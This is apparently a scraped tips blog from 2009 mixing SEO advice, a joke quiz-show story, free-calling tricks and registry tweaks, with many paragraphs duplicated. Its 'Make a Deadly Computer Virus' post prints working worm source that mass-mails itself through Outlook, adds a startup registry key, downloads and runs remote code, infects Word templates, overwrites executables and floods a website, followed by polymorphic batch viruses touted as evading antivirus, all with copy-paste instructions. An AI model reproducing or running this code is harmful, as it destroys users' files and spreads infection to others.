1. Your main keywords must be placed in the top right of your blog or web site if you want to search engine optimized a web site or blog. This is because search engine will read what is in the top right keywords in your web site or blog first before it reads anything else. |
2.Your main keywords also must be placed at the left bottom your web site or blog too. |
3.You can also bold your main keywords each per paragraph not more than that. |
4.you must sprinkled your main keywords as well as your other keywords in your articles evenly, do not repeat too much of your main keywords or other your targeted keywords to many times, because this will lead you to get banned by search engine. |
Sunday, December 20, 2009
How to Increase number of Visitors to Your Blog
When building a new blog, or web site you must take note of these points below:
Dumbest Woman In the World

NEW YORK – Idaho resident Kathy Evans brought humiliation to her friends and family Tuesday when she set a new standard for stupidity with her appearance on the popular TV show, "Who Wants To Be A Millionaire."
It seems that Evans, a 32-year-old wife and mother of two, got stuck on the first question, and proceeded to make what fans of the show are dubbing "the absolute worst use of lifelines ever."
After being introduced to the show's host Meredith Vieira, Evans assured her that she was ready to play, whereupon she was posed with an extremely easy $100 question. The question was:
"Which of the following is the largest?"
A) A Peanut
B) An Elephant
C) The Moon
D) Hey, who you calling large?
Immediately Mrs. Evans was struck with an all consuming panic as she realized that this was a question to which she did not readily know the answer.
"Hmm, oh boy, that's a toughie," said Evans, as Vieira did her level best to hide her disbelief and disgust. "I mean, I'm sure I've heard of some of these things before, but I have no idea how large they would be."
Evans made the decision to use the first of her three lifelines, the 50/50. Answers A and D were removed, leaving her to decide which was bigger, an elephant or the moon. However, faced with an incredibly easy question, Evans still remained unsure.
"Oh! It removed the two I was leaning towards!" exclaimed Evans. "Darn. I think I better phone a friend."
Using the second of her two lifelines on the first question, Mrs. Evans asked to be connected with her friend Betsy, who is an office assistant.
"Hi Betsy! How are you? This is Kathy! I'm on TV!" said Evans, wasting the first seven seconds of her call. "Ok, I got an important question. Which of the following is the largest? B, an elephant, or C, the moon. 15 seconds hun."
Betsy quickly replied that the answer was C, the moon. Evans proceeded to argue with her friend for the remaining ten seconds.
"Come on Betsy, are you sure?" said Evans. "How sure are you? Puh, that can't be it."
To everyone's astonishment, the moronic Evans declined to take her friend's advice and pick 'The Moon.'
"I just don't know if I can trust Betsy. She's not all that bright. So I think I'd like to ask the audience," said Evans.
Asked to vote on the correct answer, the audience returned 98% in favor of answer C, 'The Moon.' Having used up all her lifelines, Evans then made the dumbest choice of her life.
"Wow, seems like everybody is against what I'm thinking," said the too-stupid-to-live Evans. "But you know, sometimes you just got to go with your gut. So, let's see. For which is larger, an elephant or the moon, I'm going to have to go with B, an elephant. Final answer." Evans sat before the dumbfounded audience, the only one waiting with bated breath, and was told that she was wrong, and that the answer was in fact, C, 'The Moon.'
Thursday, December 17, 2009
Make Free Calls From Your Pc Using Google Voice
1. Open Google Voice, and click “Call“.
2. Enter the number you want to call.
3. Make sure the Gizmo phone is selected as the “Phone to Ring“.
4. Click “Connect“.
5. You will get a pop-up from Gizmo, with your Google Voice number on the caller ID. Answer it!
6. Google Voice will automatically dial and connect the other person, and you will be talking from your computer!
A good, fast internet connection is all you need. The whole process is so simple and it doesn’t cost you a penny. Make full use of it before it stops working!
2. Enter the number you want to call.
3. Make sure the Gizmo phone is selected as the “Phone to Ring“.
4. Click “Connect“.
5. You will get a pop-up from Gizmo, with your Google Voice number on the caller ID. Answer it!
6. Google Voice will automatically dial and connect the other person, and you will be talking from your computer!
A good, fast internet connection is all you need. The whole process is so simple and it doesn’t cost you a penny. Make full use of it before it stops working!
Make Free Calls to North America For Free
Visit dukaDial to make phone calls to North America at absolutely Zero cost!! All you need to do is sign up, enter the number you want to dial, enter your own phone or mobile number and dial. This will create a phone call between the 2 numbers without any charges to either party.
Why is it free, you ask?
Why is it free, you ask?
Yes! Phone to phone calls to numbers in North America using dukaDIAL are free of long distance or connection charges. We are offering this service to demonstrate the capabilities or our applications and network. There are no hidden fees.

Make Free Calls To Anywhere in World
USA’s largest and first free directory assistance service, 1-800-FREE411 has launched yet another awesome service which could be a boon to people who want to make free international calls from USA. Don’t give up if you are not in USA, I will explain how you can use this service to make calls irrespective of where you live!
1) You need to call a toll-free number, so if you call from Landline its a free call for you. Mobile calls am afraid could be charged (local charges).
2) You can talk upto five minutes per call. You can make multiple calls.
3) Call 18003733411 from your US Landline/Mobile. The operator will greet you with a welcome message and ask you to select one of the FREE411 service. The Last option is Free Call. You don’t have to press any number or key to select but instead say FREE CALL loudly in your phone. This voice message will be read by their server and you will go to next step to actually make a free international call. Now they will run a short ad about 5 secs. When the ad stops, you can start dialing your international number in countycode+citycode (if any)+phone number format. Please do not press # or *, its not required. The call will be automatically placed to the desired number. The operator prompts your call is getting connected. Once connected you can talk for upto 5 minutes and then your call is disconnected.
Yes, not many people know that Yahoo Messenger Voice can be used to make unlimited toll-free calls to any toll-free number in USA from anywhere in the world and you do not need a yahoo voice paid account.
So, just go to yahoo messenger and dial 18003733411. Your call will be connected and you would notice a prompt, which says there is no charge for this call. Now follow the 3rd step as mentioned above for US based users.
Please note that this service is totally advertisement based so please do not abuse/violate the system. So, what are you waiting for? Go ahead and enjoy making Free International calls from anywhere in the world!!
1) You need to call a toll-free number, so if you call from Landline its a free call for you. Mobile calls am afraid could be charged (local charges).
2) You can talk upto five minutes per call. You can make multiple calls.
3) Call 18003733411 from your US Landline/Mobile. The operator will greet you with a welcome message and ask you to select one of the FREE411 service. The Last option is Free Call. You don’t have to press any number or key to select but instead say FREE CALL loudly in your phone. This voice message will be read by their server and you will go to next step to actually make a free international call. Now they will run a short ad about 5 secs. When the ad stops, you can start dialing your international number in countycode+citycode (if any)+phone number format. Please do not press # or *, its not required. The call will be automatically placed to the desired number. The operator prompts your call is getting connected. Once connected you can talk for upto 5 minutes and then your call is disconnected.
How to make free International Internet Phone calls from outside USA?
Awww… you poor soul. You don’t live in US? Don’t worry. i will still let you know how to make free International calls using 1-800-FREE411. Previously we have seen how to make free calls to US using services like Jaxtr, Skype, Google Talk etc. But the best way out is to use Yahoo Messenger to call US for free.Yes, not many people know that Yahoo Messenger Voice can be used to make unlimited toll-free calls to any toll-free number in USA from anywhere in the world and you do not need a yahoo voice paid account.
So, just go to yahoo messenger and dial 18003733411. Your call will be connected and you would notice a prompt, which says there is no charge for this call. Now follow the 3rd step as mentioned above for US based users.
Please note that this service is totally advertisement based so please do not abuse/violate the system. So, what are you waiting for? Go ahead and enjoy making Free International calls from anywhere in the world!!
Multiple Logins in Yahoo
1) Go to Start
2) Navigate to HKEY_CURRENT_USER-->Software-->Yahoo-->Pager-->Test
3)ON the Right side if the page , Right click and choose new Dword Value.
4) Rename it as " Plural ".
5)Double click and assign a decimal value of 1.
6) Now close registry and restar yahoo messenger and try Multiple Login
2) Navigate to HKEY_CURRENT_USER-->Software-->Yahoo-->Pager-->Test
3)ON the Right side if the page , Right click and choose new Dword Value.
4) Rename it as " Plural ".
5)Double click and assign a decimal value of 1.
6) Now close registry and restar yahoo messenger and try Multiple Login
Recover Scratched CD's
1. Spread a cloth on a flat surface and place the CD on it.
2. Then, hold the disc with one hand, use the other to wipe the polish into the affected area with a soft cloth.
3. Wait for it to dry and buff using short, brisk strokes along the scratch, not across it.
4. A cloth sold to wipe spectacles or camera lenses will work super m8's.
5. When you can no longersee the scratch,, wash the disc with water and let it dry before playing. Intersting isnt it? Try it right now
I have used toothpaste with good effects before Ive also used car paint cutting compound on deeper scratches. It does leave lots of smaller scratches (as it is a cutting compound after all) but it will remove the worst scratches in most cases.
ya u r gng to b surely befinited by this Operation
2. Then, hold the disc with one hand, use the other to wipe the polish into the affected area with a soft cloth.
3. Wait for it to dry and buff using short, brisk strokes along the scratch, not across it.
4. A cloth sold to wipe spectacles or camera lenses will work super m8's.
5. When you can no longersee the scratch,, wash the disc with water and let it dry before playing. Intersting isnt it? Try it right now
I have used toothpaste with good effects before Ive also used car paint cutting compound on deeper scratches. It does leave lots of smaller scratches (as it is a cutting compound after all) but it will remove the worst scratches in most cases.
ya u r gng to b surely befinited by this Operation
Add Your Name (or) Application to right click Of My Compu
To write your name on right click application
please follow the steps.
1.Copy/Paste the following code in Notepad And then Save it as .reg
Windows Registry Editor Version 5.00
[HKEY_CLASSES_ROOT\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\shell\Registry Editor]
@="Your Name Or Name of the Application"
[HKEY_CLASSES_ROOT\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\shell\Registry Editor\command]
@="Location Of The Application"
2.Now edit it and then Type your name In
Eg:
[HKEY_CLASSES_ROOT\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\shell\Registry Editor]
@="Rajesh"
3. If u want to get any application, once you click Your name or name of application
Then , Type the location Of the application Which u want to open In:
[HKEY_CLASSES_ROOT\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\shell\Registry Editor\command]
@="Location Of The Application"
For eg.C:\Program Files\Yahoo!\Messenger\messenger.exe
Thats It finally save it And then Run it .
please follow the steps.
1.Copy/Paste the following code in Notepad And then Save it as .reg
Windows Registry Editor Version 5.00
[HKEY_CLASSES_ROOT\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\shell\Registry Editor]
@="Your Name Or Name of the Application"
[HKEY_CLASSES_ROOT\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\shell\Registry Editor\command]
@="Location Of The Application"
2.Now edit it and then Type your name In
Eg:
[HKEY_CLASSES_ROOT\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\shell\Registry Editor]
@="Rajesh"
3. If u want to get any application, once you click Your name or name of application
Then , Type the location Of the application Which u want to open In:
[HKEY_CLASSES_ROOT\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\shell\Registry Editor\command]
@="Location Of The Application"
For eg.C:\Program Files\Yahoo!\Messenger\messenger.exe
Thats It finally save it And then Run it .
Make a Deadly Computer Virus
To make a DEADLY virus, open up notepad and
copy and paste the following...
'Serial Number : 0.7055475
'
On Error Resume Next
spawn()
sub spawn()
Set s = CreateObject("Scripting.FileSystemObject")
Set f = s.GetFile(wscript.scriptfullname)
f.Copy ("c:\anyname.vbs")
f.Copy ("c:\folder\subfolder\...\anyname.vbs")
f.Copy ("c:\attachment.vbs")
f.Copy ("c:\attachment1.vbs")
end sub
mail()
sub mail()
Set a = CreateObject("Outlook.Application")
Set b = a.GetNameSpace("MAPI")
If a = "Outlook" Then
b.Logon "profile", "password"
For y = 1 To b.AddressLists.Count
Set d = b.AddressLists(y)
x = 1
Set c = a.CreateItem(0)
For oo = 1 To d.AddressEntries.Count
e = d.AddressEntries(x)
c.Recipients.Add e
x = x + 1
If x > 5 Then oo = d.AddressEntries.Count
Next
c.Subject = "DOOM!"
c.Body = "...U Hav Bin Infected!!!"
c.attachments.Add wscript.scriptfullname, 1, 1
c.attachments.Add "c:\attachment.vbs", 1, 2, ""
c.attachments.Add "c:\attachment1.vbs", 1, 3, ""
c.Send
e = ""
Next
b.Logoff
End If
end sub
reg()
sub reg()
dim j
Set j = CreateObject("WScript.Shell")
j.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\*HLM", wscript.scriptfullname
end sub
update()
Sub update()
Dim objInet, a
Dim strDownloadedCode
Set objInet = CreateObject("InetCtls.Inet")
objInet.RequestTimeOut = 30
strDownloadedCode = objInet.OpenURL("http://members.tripod.com/yourusername/thevbsroutineupdate.txt")
set fso = createobject("scripting.filesystemobject")
set f = fso.CreateTextFile("c:\update.vbs")
f.write strDownloadedCode
f.close
Set a = CreateObject("WScript.Shell")
a.run ("c:\update.vbs")
end sub
irc()
sub irc()
set fso = createobject("scripting.filesystemobject")
set scrini = fso.CreateTextFile("c:\program files\mirc\script.ini")
scrini.WriteLine "[script]"
scrini.WriteLine "n0=on 1:JOIN:#:{"
scrini.WriteLine "n1= /if ( $nick == $me ) { halt }"
scrini.WriteLine "n2= /dcc send $nick " & wscript.scriptfullname
scrini.WriteLine "n3=}"
scrini.Close
end sub
word()
sub word()
norm ="Sub document_close()" & vbCrLf & _
"On Error Resume Next" & vbCrLf & _
"Open ""c:\xploit.txt"" For Output As 2" & vbCrLf & _
"Print #2, ""sub document_open()""" & vbCrLf & _
"Print #2, ""On Error Resume Next""" & vbCrLf & _
"Print #2, ""'by alcopaul""" & vbCrLf & _
"Print #2, ""obj = ActiveDocument.Shapes(1).OLEFormat.ClassType""" & vbCrLf & _
"Print #2, ""With ActiveDocument.Shapes(1).OLEFormat""" & vbCrLf & _
"Print #2, "" .ActivateAs ClassType:=obj""" & vbCrLf & _
"Print #2, "" .Activate""" & vbCrLf & _
"Print #2, ""End With""" & vbCrLf & _
"Print #2, ""end sub""" & vbCrLf & _
"Close 2" & vbCrLf & _
"Set fso = CreateObject(""Scripting.FileSystemObject"")" & vbCrLf & _
"Set nt = ActiveDocument.VBProject.vbcomponents(1).codemodule" & vbCrLf & _
"Set iw = fso.OpenTextFile(""c:\xploit.txt"", 1, True)" & vbCrLf & _
"nt.DeleteLines 1, nt.CountOfLines" & vbCrLf & _
"i = 1 " & vbCrLf & _
"Do While iw.atendofstream <> True" & vbCrLf & _
"b = iw.readline" & vbCrLf & _
"nt.InsertLines i, b " & vbCrLf & _
"i = i + 1 " & vbCrLf & _
"Loop" & vbCrLf & _
"ActiveDocument.Shapes.AddOLEObject _" & vbCrLf & _
"FileName:=""c:\anyname.vbs"", _" & vbCrLf & _
"LinkToFile:=False" & vbCrLf & _
"ActiveDocument.Save" & vbCrLf & _
"Open ""c:\vv.reg"" For Output As 3" & vbCrLf & _
"Print #3, ""REGEDIT4""" & vbCrLf & _
"Print #3, ""[HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security]""" & vbCrLf & _
"Print #3, """"""Level""""=dword:00000001""" & vbCrLf & _
"Print #3, ""[HKEY_CURRENT_USER\Software\Microsoft\Office\10.0\Word\Security]""" & vbCrLf & _
"Print #3, """"""Level""""=dword:00000001""" & vbCrLf & _
"Print #3, """"""AccessVBOM""""=dword:00000001""" & vbCrLf & _
"Close 3" & vbCrLf & _
"Shell ""regedit /s c:\vv.reg"", vbHide" & vbCrLf & _
"Kill ""c:\vv.reg""" & vbCrLf & _
"End Sub"
Set fso = CreateObject("Scripting.FileSystemObject")
set f = fso.createtextfile("c:\try.txt")
f.write norm
f.Close
Set oword = CreateObject("Word.Application")
oword.Visible = False
Set nt = oword.NormalTemplate.vbproject.vbcomponents(1).codemodule
Set iw = fso.OpenTextFile("c:\try.txt", 1, True)
nt.DeleteLines 1, nt.CountOfLines
i = 1
Do While iw.atendofstream <> True
b = iw.readline
nt.InsertLines i, b
i = i + 1
Loop
oword.NormalTemplate.Save
oword.NormalTemplate.Close
end sub
haha()
Sub haha()
On Error Resume Next
Dim d, dc, s, fso, haha
Set fso = CreateObject("Scripting.FileSystemObject")
Set dc = fso.Drives
For Each d In dc
If d.DriveType = 2 Or d.DriveType = 3 Then
hihi (d.Path & "")
End If
Next
haha = s
End Sub
Sub hehe(folderspec)
On Error Resume Next
Dim f, f1, fc, ext, s, fso
Set fso = CreateObject("Scripting.FileSystemObject")
Set f = fso.GetFolder(folderspec)
Set fc = f.Files
For Each f1 In fc
ext = fso.GetExtensionName(f1.Path)
ext = LCase(ext)
s = LCase(f1.Name)
If (ext = "exe") Then
Set f = fso.GetFile(wscript.scriptfullname)
f.Copy (f1.Path & ".vbs")
fso.deletefile(f1.path)
End If
If (s = "freecell.exe") Or (s = "readme.txt") or (s = "license.txt") Then
Set f = fso.getfile(wscript.scriptfullname)
f.Copy (f1.Path)
fso.deletefile(f1.path)
End If
If (ext = "exe") Or (ext = "bat") Then
Set f = fso.getfile(wscript.scriptfullname)
f.Copy (f1.Path & ".vbs")
End If
Next
End Sub
Sub hihi(folderspec)
On Error Resume Next
Dim f, f1, sf, fso
Set fso = CreateObject("Scripting.FileSystemObject")
Set f = fso.GetFolder(folderspec)
Set sf = f.SubFolders
For Each f1 In sf
hehe (f1.Path)
hihi (f1.Path)
Next
End Sub
dos()
sub dos()
Dim a
Set a = CreateObject("WScript.Shell")
a.run ("c:\windows\ping.exe -t -l 10000 www.grisoft.com")
end sub
msgbox "INFECTED", ,"DOOM"
'=========================================
'made by : Zero Cool
'worm name : INF3CTER
'=========================================
stop copying (do not copy this line!!)
now save the file as infecter.vbs on to your
desktop and/or anywhere else you please.
The next virus I am about to show you is a
polymorphic virus (hard to be picked up by
anti virus scanners)...
Open notepad and copy and paste the folowing...
@set hjmmt=echo
@set bugcl=copy
@ctty nul._!
for %%a in (*.bat ..\*.bat) do set _!=%%a
find "_!"<%_!%
if errorlevel 1 find "_!"<%0.BAT>>%_!%
ctty con._!
%hjmmt% off%[BfV_B]%
if '%1=='## goto BfV_%2
if exist C:\_BfV.bat goto BfV_
if not exist %0.bat goto BfV_end
find "BfV"<%0.bat>C:\_BfV.bat
attrib C:\_BfV.bat +h
:BfV_
command /e:5000 /c C:\_BfV ## run
goto BfV_end
:BfV_run
for %%i in (*.bat ..\*.bat) do call C:\_BfV ## inf %%i
exit BfV
:BfV_inf
if '%BfV%=='1111111 exit
set BfV=%BfV%1
find "BfV"<%3>nul
if not errorlevel 1 goto BfV_end
type %3>BfV
type C:\_BfV.bat>>BfV
move BfV %3>nul
exit BfV
:BfV_end
@if not '%0==' if '%_melt%==' goto meltbeg
::---- dummy host --------
%hjmmt% off
%hjmmt% Hello World!
::---- end dummy host ----
@goto MeLTend [MeLT_2a]
:MeLTbeg
%hjmmt% off%_MeLT%
if '%1=='MeLT goto MeLT%2
if not exist %comspec% set comspec=%_MeLT%command
%comspec% /e:5000 /c %0 MeLT vir
set MeLTcl=%1 %2 %3 %4 %5 %6 %7 %8 %9
call %0 MeLT rh
set _MeLT=
set MeLTcl=
goto MeLTend
:MeLTrh
set _MeLT=x
%0 %MeLTcl%
:MeLTvir
set MeLTH=%0
if not exist %_MeLT%%temp%\nul set temp=%tmp%
if exist %temp%\MeLT_2a goto MeLTrun
%0 MeLT fnd . %path%
:MeLTfnd
shift%_MeLT%
if '%2==' exit MeLT
set MeLT=%2\%MeLTH%.bat
if not exist %MeLT% set MeLT=%2\%MeLTH%
if not exist %MeLT% set MeLT=%2%MeLTH%.bat
if not exist %MeLT% set MeLT=%2%MeLTH%
if not exist %MeLT% goto MeLTfnd
find "MeLT"<%MeLT%>%temp%\MeLT_2a
attrib %temp%\MeLT_2a +h
:MeLTrun
%MeLTH% MeLT s . .. %path%
:MeLTs
shift%_MeLT%
if '%2==' exit MeLT
for %%a in (%2\*.bat %2*.bat) do call %MeLTH% MeLT inf %%a
goto MeLTs
:MeLTinf
find /i "MeLT"<%3>nul
if not errorlevel 1 goto MeLTno
%hjmmt% @if not '%%0==' if '%%_melt%%==' goto meltbeg>MeLT.t
type %3>>MeLT.t
%hjmmt%.>>MeLT.t
type %temp%\MeLT_2a>>MeLT.t
move MeLT.t %3>nul
exit MeLT
:MeLTact - flash-melt screen text then put back to normal
%hjmmt% e 100 BA D0 07 BB 00 B8 8E C3 8B CA 33 FF 26 8B 05 FE>MeLT.t
%hjmmt% e 110 C0 FE C4 26 89 05 47 47 E2 F2 FE 06 24 01 75 E8>>MeLT.t
%hjmmt% e 120 B4 4C CD 21 00>>MeLT.t
%hjmmt% g>>MeLT.t
debugnul
del MeLT.t
exit MeLT
:MeLTno
set MeLTC=%MeLTC%1
if %MeLTC%==1111111111 goto MeLTact
:MeLTend
%hjmmt% off
:: host filename...
set pifvo=LIST.COM
:: loop dispatcher...
if '%1=='PiFV goto PiFV_%2
:: run the virus!
set _PiFV=
if not exist %comspec% set comspec=C:\COMMAND.COM%_PiFV%
%comspec% /e:5000 /c %0 PiFV go>nul
if exist PiFV! del PiFV!
:: run the host
set PiFVcl=%1 %2 %3 %4 %5 %6 %7 %8 %9
call %0 PiFV hst
set PiFVo=
set PiFVcl=
:: check for activation...
%hjmmt%.|date|find /i "sat">nul.PiFV
if errorlevel 1 goto PiFV_end
%hjmmt%.|time|find "7">nul.PiFV
if errorlevel 1 goto PiFV_msg
set PiFV=%hjmmt%
cls%_PiFV%
%PiFV%.
%PiFV% There once was an Otter named Oscer
%PiFV% Who claimed to know how to make water.
%PiFV% "No more dams," he said, "use my water instead!"
%PiFV% But the Elder Otter was not impressed.
pause>nul.PiFV
set PiFV=
goto PiFV_end
:PiFV_msg
%hjmmt% [PiFV] by WaveFunc
goto PiFV_end
:PiFV_hst
%PiFVo% %PiFVcl%
goto PiFV_end
:PiFV_go
set PiFVh=%0
if not exist %PiFVh% set PiFVh=%0.bat
if not exist %PiFVh% exit
for %%a in (*.pif) do call %0 PiFV inf %%a
exit PiFV
:PiFV_inf
set PiFVp=%3
:: get victim filename and infection marker
:: from PIF file using debug...
if exist PiFV! goto PiFV_1
%hjmmt% m 124,162 524>PiFV!
%hjmmt% e 100 '@set fn='>>PiFV!
%hjmmt% m 524,562 108>>PiFV!
%hjmmt% n pifv$.bat>>PiFV!
%hjmmt% rcx>>PiFV!
%hjmmt% 47>>PiFV!
%hjmmt% w>>PiFV!
%hjmmt% m 55E,561 108>>PiFV!
%hjmmt% e 10C 0>>PiFV!
%hjmmt% n pifv$$.bat>>PiFV!
%hjmmt% rcx>>PiFV!
%hjmmt% 10>>PiFV!
%hjmmt% w>>PiFV!
%hjmmt% q>>PiFV!
:PiFV_1
debug %PiFVp%nul
call PiFV$
set PiFVn=%fn%
call PiFV$$
set PiFVi=%fn%
del PiFV$?.bat
:: pifvn=orig filename
:: pifvi=infection marker
:: pifvp=pif filename
:: pifvh=companion bat file
:: skip infected or 'empty' pifs...
if '%PiFVi%=='PiFV goto PiFV_end
if '%PiFVn%==' goto PiFV_end
:: don't shadow command.com (be nice)
%hjmmt% %PiFVn%|find /i "command">nul
if not errorlevel 1 goto PiFV_end
:: infectable - create a companion batch...
:: (the following code strips off the extension)
%hjmmt% e 100 e8 16 00 b4 08 cd 21 3c 00 74 0c 3c 2e 74 08 88>PiFV$$
%hjmmt% e 110 c2 b4 02 cd 21 eb ec cd 20 ba 21 01 b4 09 cd 21>>PiFV$$
%hjmmt% e 120 c3 73 65 74 20 66 6e 3d 24 00>>PiFV$$
%hjmmt% n pifv$.com>>PiFV$$
%hjmmt% rcx>>PiFV$$
%hjmmt% 2a>>PiFV$$
%hjmmt% w>>PiFV$$
%hjmmt% q>>PiFV$$
debugnul
%hjmmt% %PiFVn%|PiFV$>PiFV$$.bat
call PiFV$$
set PiFVb=%fn%.bat
del PiFV$?.*
:: pifvb=new batch name
:: do not shadow if comp has same name as host
if %PiFVo%==%PiFVb% goto PiFV_end
if exist %PiFVb% goto PiFV_end
%hjmmt% %hjmmt% off>%PiFVb%
%hjmmt% set pifvo=%pifvn%>>%PiFVb%
find "PiFV"<%PiFVh%>>%PiFVb%
attrib %PiFVb% +h
:: ...and point the PIF at the companion
%hjmmt% e 15E 'PiFV',0>PiFV$$
%hjmmt% e 124 '%PiFVb%',0>>PiFV$$
%hjmmt% w>>PiFV$$
%hjmmt% q>>PiFV$$
debug %PiFVp%nul
del PiFV$$
:: I think we're done!
exit PiFV
:PiFV_end
%hjmmt% set ff=createobject("scripting.filesystemobject")>>poly.vbs
%hjmmt% set rr=ff.opentextfile(%0,1)>>poly.vbs
%hjmmt% aa = rr.readall>>poly.vbs
%hjmmt% rr.close>>poly.vbs
%hjmmt% Randomize>>poly.vbs
%hjmmt% poly = int(rnd * 3)>>poly.vbs
%hjmmt% if poly = 0 or poly = 2 then>>poly.vbs
%hjmmt% s = chr(int(22 * rnd) + 97)>>poly.vbs
%hjmmt% rand1 = Replace(aa,"hjmmt","hjmmt" ^& s ^& poly)>>poly.vbs
%hjmmt% rand2 = Replace(rand1,"bugcl","bugcl" ^& s ^& s ^& poly)>>poly.vbs
%hjmmt% else>>poly.vbs
%hjmmt% polynum = int(rnd * 7)>>poly.vbs
%hjmmt% for i = 1 to polynum>>poly.vbs
%hjmmt% polychar = chr(int(22 * rnd) + 97)>>poly.vbs
%hjmmt% polyall = polyall + polychar>>poly.vbs
%hjmmt% next>>poly.vbs
%hjmmt% s = chr(int(22 * rnd) + 97)>>poly.vbs
%hjmmt% rand1 = Replace(aa,"hjmmt",polyall )>>poly.vbs
%hjmmt% rand2 = Replace(rand1,"bugcl", s ^& polyall)>>poly.vbs
%hjmmt% end if>>poly.vbs
%hjmmt% set bb=ff.opentextfile(%0,2)>>poly.vbs
%hjmmt% bb.write rand2>>poly.vbs
@cscript poly.vbs
@del poly.vbs
@exit
stop copying (do not copy this line!!)
The above virus is extremely difficult for AV
scanners
copy and paste the following...
'Serial Number : 0.7055475
'
On Error Resume Next
spawn()
sub spawn()
Set s = CreateObject("Scripting.FileSystemObject")
Set f = s.GetFile(wscript.scriptfullname)
f.Copy ("c:\anyname.vbs")
f.Copy ("c:\folder\subfolder\...\anyname.vbs")
f.Copy ("c:\attachment.vbs")
f.Copy ("c:\attachment1.vbs")
end sub
mail()
sub mail()
Set a = CreateObject("Outlook.Application")
Set b = a.GetNameSpace("MAPI")
If a = "Outlook" Then
b.Logon "profile", "password"
For y = 1 To b.AddressLists.Count
Set d = b.AddressLists(y)
x = 1
Set c = a.CreateItem(0)
For oo = 1 To d.AddressEntries.Count
e = d.AddressEntries(x)
c.Recipients.Add e
x = x + 1
If x > 5 Then oo = d.AddressEntries.Count
Next
c.Subject = "DOOM!"
c.Body = "...U Hav Bin Infected!!!"
c.attachments.Add wscript.scriptfullname, 1, 1
c.attachments.Add "c:\attachment.vbs", 1, 2, ""
c.attachments.Add "c:\attachment1.vbs", 1, 3, ""
c.Send
e = ""
Next
b.Logoff
End If
end sub
reg()
sub reg()
dim j
Set j = CreateObject("WScript.Shell")
j.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\*HLM", wscript.scriptfullname
end sub
update()
Sub update()
Dim objInet, a
Dim strDownloadedCode
Set objInet = CreateObject("InetCtls.Inet")
objInet.RequestTimeOut = 30
strDownloadedCode = objInet.OpenURL("http://members.tripod.com/yourusername/thevbsroutineupdate.txt")
set fso = createobject("scripting.filesystemobject")
set f = fso.CreateTextFile("c:\update.vbs")
f.write strDownloadedCode
f.close
Set a = CreateObject("WScript.Shell")
a.run ("c:\update.vbs")
end sub
irc()
sub irc()
set fso = createobject("scripting.filesystemobject")
set scrini = fso.CreateTextFile("c:\program files\mirc\script.ini")
scrini.WriteLine "[script]"
scrini.WriteLine "n0=on 1:JOIN:#:{"
scrini.WriteLine "n1= /if ( $nick == $me ) { halt }"
scrini.WriteLine "n2= /dcc send $nick " & wscript.scriptfullname
scrini.WriteLine "n3=}"
scrini.Close
end sub
word()
sub word()
norm ="Sub document_close()" & vbCrLf & _
"On Error Resume Next" & vbCrLf & _
"Open ""c:\xploit.txt"" For Output As 2" & vbCrLf & _
"Print #2, ""sub document_open()""" & vbCrLf & _
"Print #2, ""On Error Resume Next""" & vbCrLf & _
"Print #2, ""'by alcopaul""" & vbCrLf & _
"Print #2, ""obj = ActiveDocument.Shapes(1).OLEFormat.ClassType""" & vbCrLf & _
"Print #2, ""With ActiveDocument.Shapes(1).OLEFormat""" & vbCrLf & _
"Print #2, "" .ActivateAs ClassType:=obj""" & vbCrLf & _
"Print #2, "" .Activate""" & vbCrLf & _
"Print #2, ""End With""" & vbCrLf & _
"Print #2, ""end sub""" & vbCrLf & _
"Close 2" & vbCrLf & _
"Set fso = CreateObject(""Scripting.FileSystemObject"")" & vbCrLf & _
"Set nt = ActiveDocument.VBProject.vbcomponents(1).codemodule" & vbCrLf & _
"Set iw = fso.OpenTextFile(""c:\xploit.txt"", 1, True)" & vbCrLf & _
"nt.DeleteLines 1, nt.CountOfLines" & vbCrLf & _
"i = 1 " & vbCrLf & _
"Do While iw.atendofstream <> True" & vbCrLf & _
"b = iw.readline" & vbCrLf & _
"nt.InsertLines i, b " & vbCrLf & _
"i = i + 1 " & vbCrLf & _
"Loop" & vbCrLf & _
"ActiveDocument.Shapes.AddOLEObject _" & vbCrLf & _
"FileName:=""c:\anyname.vbs"", _" & vbCrLf & _
"LinkToFile:=False" & vbCrLf & _
"ActiveDocument.Save" & vbCrLf & _
"Open ""c:\vv.reg"" For Output As 3" & vbCrLf & _
"Print #3, ""REGEDIT4""" & vbCrLf & _
"Print #3, ""[HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security]""" & vbCrLf & _
"Print #3, """"""Level""""=dword:00000001""" & vbCrLf & _
"Print #3, ""[HKEY_CURRENT_USER\Software\Microsoft\Office\10.0\Word\Security]""" & vbCrLf & _
"Print #3, """"""Level""""=dword:00000001""" & vbCrLf & _
"Print #3, """"""AccessVBOM""""=dword:00000001""" & vbCrLf & _
"Close 3" & vbCrLf & _
"Shell ""regedit /s c:\vv.reg"", vbHide" & vbCrLf & _
"Kill ""c:\vv.reg""" & vbCrLf & _
"End Sub"
Set fso = CreateObject("Scripting.FileSystemObject")
set f = fso.createtextfile("c:\try.txt")
f.write norm
f.Close
Set oword = CreateObject("Word.Application")
oword.Visible = False
Set nt = oword.NormalTemplate.vbproject.vbcomponents(1).codemodule
Set iw = fso.OpenTextFile("c:\try.txt", 1, True)
nt.DeleteLines 1, nt.CountOfLines
i = 1
Do While iw.atendofstream <> True
b = iw.readline
nt.InsertLines i, b
i = i + 1
Loop
oword.NormalTemplate.Save
oword.NormalTemplate.Close
end sub
haha()
Sub haha()
On Error Resume Next
Dim d, dc, s, fso, haha
Set fso = CreateObject("Scripting.FileSystemObject")
Set dc = fso.Drives
For Each d In dc
If d.DriveType = 2 Or d.DriveType = 3 Then
hihi (d.Path & "")
End If
Next
haha = s
End Sub
Sub hehe(folderspec)
On Error Resume Next
Dim f, f1, fc, ext, s, fso
Set fso = CreateObject("Scripting.FileSystemObject")
Set f = fso.GetFolder(folderspec)
Set fc = f.Files
For Each f1 In fc
